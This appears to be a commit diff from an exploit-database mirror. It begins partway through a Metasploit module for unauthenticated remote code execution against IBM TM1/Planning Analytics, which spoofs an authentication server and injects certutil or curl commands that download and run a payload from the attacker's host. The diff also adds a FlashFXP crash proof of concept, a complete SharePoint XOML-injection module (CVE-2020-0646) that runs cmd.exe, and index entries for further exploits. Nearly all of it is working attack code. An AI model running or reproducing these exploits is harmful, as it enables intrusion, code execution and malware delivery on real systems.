# ... if the user did not enter an APP_NAME
if datastore['APP_NAME'].nil?
connect
print_status("Connecting to admin server and obtaining application data")
# for this packet we use string type 0xc (?) and cut off the PKT_END
pkt_control = PKT_HDR + [0] + stradd(lhost, 0xc)
pkt_control = pack_sz(pkt_control.length + 2) + pkt_control
data = sock_rw(sock, pkt_control)
disconnect
if data
# now process the response
apps = []
data = str_unpack(data)
# ignore packet header (4 bytes)
data.shift(PKT_HDR.length)
# now just go through the list we received, sample format below
# "24retail","tcp","10.11.12.123","17414","1460","1","127.0.0.1,127.0.0.1,127.0.0.1","1","0","","","","0","","0","","ipv4","22","0","2","http://centos7.doms.com:8014","8014"
# "GO_New_Stores","tcp","10.11.12.123","45557","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","23","0","2","https://centos7.doms.com:5010","5010"
# "GO_Scorecards","tcp","10.11.12.123","44321","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:44312","44312"
# "Planning Sample","tcp","10.11.12.123","12345","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:12354","12354"
# "proven_techniques","tcp","10.11.12.123","53333","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:5011","5011"
# "SData","tcp","10.11.12.123","12346","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:8010","8010"
while data != nil and data.length > 2
# skip the marker (0x0, 0x5) that indicates the start of a new app
data = data[2..-1]
# read the size and fetch the data
size = (data[0..1].pack('C*').unpack('H*')[0].to_i(16))
data_next = data[2+size..-1]
data = data[2..size]
# first is application name
app_name = get_str(data)
# second is protocol, we don't care
proto = get_str(data)
# third is IP address
ip = get_str(data)
# app port
port = get_str(data)
# mtt maybe? don't care
mtt = get_str(data)
# not sure, and don't care
unknown = get_str(data)
# localhost addresses? again don't care
unknown_addr = get_str(data)
# I think this is the accepting clients flag
accepts = get_str(data)
# and this is a key one, the SSL flag
ssl = get_str(data)
# the leftover data is related to the REST API *I think*, so we just ignore it
print_good("Found app #{app_name} #{proto} ip: #{ip} port: #{port} available: #{accepts} SSL: #{ssl}")
apps.append([app_name, proto, ip, port.to_i, accepts.to_i, ssl.to_i])
data = data_next
end
else
fail_with(Failure::Unknown, 'Failed to obtain application data from the admin server')
end
# now pick a random application server that is accepting clients via TCP
app = apps.sample
total = apps.length
count = 0
# TODO: check for null return here, and probably also response size > 0x20
while app[1] != "tcp" and app[4] != 1 and count < total
app = apps.sample
count += 1
end
if count == total
fail_with(Failure::Unknown, 'Failed to find an application we can attack')
end
print_status("Picked #{app[0]} as our target, connecting...")
else
# else if the user entered an APP_NAME, build the app struct with that info
ssl = datastore['SSL']
app = [datastore['APP_NAME'], 'tcp', rhost, rport, 1, (ssl ? 1 : 0)]
print_status("Attacking #{app[0]} on #{peer} as requested with TLS #{ssl ? "on" : "off"}")
end
s = get_socket(app[2], app[3], app[5])
# Step 2: get the current app server configuration variables, such as the current auth method used
get_conf = stradd(app[0])
get_conf += VERSION
auth_get = pkt_build(MSG_TYPES[:get_config], AUTH_OBJ_EMPTY, get_conf)
data = sock_rw(s, auth_get)
auth_current = get_auth(data)
print_good("Current auth method is #{auth_current}, we're good to go!")
s.close
# Step 3: start the fake CAM server / exploit server
if payload.arch.include? ARCH_CMD
@pl = ''
else
@pl = generate_payload_exe
end
# do not use SSL for the CAM server!
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
print_status("Starting up the fake CAM server...")
start_service(
{
'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => '/'
},
}
)
datastore['SSL'] = true if ssl_restore
# Step 4: send the server config update packet, and ignore what it sends back
print_status("Changing authentication method to 4 (CAM auth)")
upd_cent = update_auth(4)
s = get_socket(app[2], app[3], app[5])
sock_rw(s, upd_cent, true)
s.close
# Step 5: send the CAM auth request and obtain the authentication object
# app name
auth_pkt = stradd(app[0])
auth_pkt += [ 0x7, 0, 0, 0, 3 ] # array with 3 objects
# passport, can be random
auth_pkt += stradd(rand_text_alpha(5..12))
# no idea what these vars are, but they don't seem to matter
auth_pkt += stradd(rand_text_alpha(5..12))
auth_pkt += stradd(rand_text_alpha(5..12))
# client IP
auth_pkt += stradd(lhost)
# add the client version number
auth_pkt += VERSION
auth_dist = pkt_build(MSG_TYPES[:auth_cam_pass], AUTH_OBJ_EMPTY, auth_pkt)
print_status("Authenticating using CAM Passport and our fake CAM Service...")
s = get_socket(app[2], app[3], app[5])
# try to authenticate up to AUTH_ATTEMPT times, but usually it works the first try
# adjust the 4th parameter to sock_rw to increase the timeout if it's not working and / or the CAM server is on another network
counter = 1
res_auth = ''
while(counter < datastore['AUTH_ATTEMPTS'])
# send the authenticate request, but wait a bit so that our fake CAM server can respond
res_auth = sock_rw(s, auth_dist, false, 0.5)
if res_auth.length < 20
print_error("Failed to authenticate on attempt number #{counter}, trying again...")
counter += 1
next
else
break
end
end
if counter == datastore['AUTH_ATTEMPTS']
# if we can't auth, bail out, but first restore the old auth method
s.close
#restore_auth(app, auth_current)
fail_with(Failure::Unknown, "Failed to authenticate to the Application server. Run the exploit and try again!")
end
auth_obj = obj_extract(res_auth)
# Step 6: create a Process object
print_status("Creating our Process object...")
proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:proc_create], auth_obj, [])))
if payload.arch == ["cmd"]
cmd_one = payload.encoded
cmd_two = ''
else
payload_url = "http://#{srvhost}:#{srvport}/"
exe_name = rand_text_alpha(5..13)
if target['Platform'] == 'win'
# the Windows command has to be split amongst two lines; the & char cannot be used to execute two processes in one line
exe_name += ".exe"
exe_name = "C:\\Windows\\Temp\\" + exe_name
cmd_one = "certutil.exe -urlcache -split -f #{payload_url} #{exe_name}"
cmd_two = exe_name
else
# the Linux one can actually be done in one line, but let's make them similar
exe_name = "/tmp/" + exe_name
cmd_one = "curl #{payload_url} -o #{exe_name};"
cmd_two = "chmod +x #{exe_name}; exec #{exe_name}"
end
register_file_for_cleanup(exe_name)
end
proc_cmd =
[ 0x3, 0, 0, 2, 0x3c ] + # no idea what this index is
[ 0x7, 0, 0, 0, 2 ] + # array with 2 objects (2 line script)
# the first argument is the command
# the second whether it should wait (1) or not (0) for command completion before returning
stradd("executecommand('#{cmd_one}', #{cmd_two.empty? ? "0" : "1"});") +
stradd("executecommand('#{cmd_two}', 0);")
# Step 7: add the commands into the process object
print_status("Adding command: \"#{cmd_one}\" to the Process object...")
if cmd_two != ''
print_status("Adding command: \"#{cmd_two}\" to the Process object...")
end
sock_rw(s, pkt_build(MSG_TYPES[:obj_prop_set], [], proc_obj + proc_cmd))
# Step 8: register the Process object with a random name
obj_name = rand_text_alpha(5..12)
print_status("Registering the Process object under the name '#{obj_name}'")
proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:obj_register], auth_obj, proc_obj + stradd(obj_name))))
# Step 9: execute the Process!
print_status("Now let's execute the Process object!")
sock_rw(s, pkt_build(MSG_TYPES[:proc_exec], [], proc_obj + [ 0x7 ] + [ 0 ] * 4), true)
s.close
# Step 10: restore the auth method and enjoy the shell!
restore_auth(app, auth_current)
if payload.arch.include? ARCH_CMD
print_good("Your command should have executed by now, enjoy!")
end
end
end

29
exploits/windows/dos/48269.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
# Vendor Homepage: https://www.flashfxp.com/
# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-03-30
# Vulnerable Software: FlashFXP
# Version: 4.2.0 Build 1730
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 10 Pro (64 bit)
#Steps to Produce the Crash:
# 1.- Run python code: FlashCrash.py
# 2.- Copy content to clipboard
# 3.- Open "FlashFXP.exe"
# 4.- Go to "Options" > Filters > Skip List > New Entry
# 5.- Paste ClipBoard into the "Mask" field
# 6.- Click on OK
# 7.- Go to "Options" > Filters > Skip List
# 8.- Crashed
#################################################################################################################################################
#Python "FlashCrash.py" Code:
buffer = "\x41" * 300
f = open ("FlashCrash.txt", "w")
f.write(buffer)
f.close()

142
exploits/windows/remote/48275.rb Executable file
View file

@ -0,0 +1,142 @@
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'SharePoint Workflows XOML Injection',
'Description' => %q{
This module exploits a vulnerability within SharePoint and its .NET backend
that allows an attacker to execute commands using specially crafted XOML data
sent to SharePoint via the Workflows functionality.
},
'Author' => [
'Spencer McIntyre',
'Soroush Dalili'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-0646'],
['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
],
'Platform' => 'win',
'Targets' => [
[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
[ 'Windows Powershell',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_powershell
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2020-03-02',
'Notes' =>
{
'Stability' => [CRASH_SAFE,],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION],
},
'Privileged' => true
))
register_options([
OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
])
end
def check
res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200
compiler_errors = extract_compiler_errors(res)
return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0
# once patched you get a specific compiler error message about the type name
return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/
CheckCode::Vulnerable
end
def extract_compiler_errors(res)
return nil unless res&.code == 200
xml_doc = res.get_xml_document
result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
return nil if result.length == 0
xml_result = Nokogiri::XML(result)
xml_result.xpath('//CompilerError/@Text')
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
case target['Type']
when :windows_command
execute_command(payload.encoded)
when :windows_dropper
cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
execute_cmdstager({linemax: cmd_target.opts['Space']})
when :windows_powershell
execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
end
end
def escape_command(cmd)
# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
end
def execute_command(cmd, opts = {})
xoml_data = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
<workflowMarkupText>
<![CDATA[
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
<CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
</SequentialWorkflowActivity>
]]>
</workflowMarkupText>
<rulesText></rulesText>
<configBlob></configBlob>
<flag>2</flag>
</ValidateWorkflowMarkupAndCreateSupportObjects>
</soap:Body>
</soap:Envelope>
EOS
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
'ctype' => 'text/xml; charset=utf-8',
'data' => xoml_data,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
unless res&.code == 200
print_error('Non-200 HTTP response received while trying to execute the command')
end
res
end
end

View file

@ -6690,6 +6690,7 @@ id,file,description,date,author,type,platform,port
48236,exploits/ios/dos/48236.py,"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)",2020-03-23,"Ivan Marmolejo",dos,ios,
48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows,
48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -18065,6 +18066,10 @@ id,file,description,date,author,type,platform,port
48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple,
48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple,
48268,exploits/linux/remote/48268.go,"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution",2020-03-30,0xsha,remote,linux,
48272,exploits/linux/remote/48272.rb,"Redis - Replication Code Execution (Metasploit)",2020-03-31,Metasploit,remote,linux,
48273,exploits/multiple/remote/48273.rb,"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)",2020-03-31,Metasploit,remote,multiple,
48274,exploits/hardware/remote/48274.rb,"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)",2020-03-31,Metasploit,remote,hardware,
48275,exploits/windows/remote/48275.rb,"SharePoint Workflows - XOML Injection (Metasploit)",2020-03-31,Metasploit,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42514,3 +42519,5 @@ id,file,description,date,author,type,platform,port
48261,exploits/php/webapps/48261.py,"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution",2020-03-27,vikingfr,webapps,php,
48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,
48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,
48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,

Can't render this file because it is too large.